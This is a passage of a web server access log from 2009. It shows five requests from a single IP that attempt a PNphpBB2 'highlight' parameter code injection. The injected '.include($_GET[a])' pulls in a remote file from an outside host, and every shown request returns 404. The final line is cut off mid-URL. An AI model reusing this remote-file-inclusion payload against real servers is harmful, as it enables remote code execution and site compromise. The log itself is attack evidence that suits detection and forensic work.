222.73.17.7 - - [04/Sep/2009:06:07:25 -0400] "GET /logs/access_log.Q109072000/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
222.73.17.7 - - [04/Sep/2009:06:07:25 -0400] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
222.73.17.7 - - [04/Sep/2009:06:07:25 -0400] "GET /logs/access_log.Q109072000%20%20/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.73.17.7 - - [04/Sep/2009:06:07:25 -0400] "GET /logs/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
222.73.17.7 - - [04/Sep/2009:06:07:33 -0400] "GET /logs/access_log.Q109061900%20%20/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.t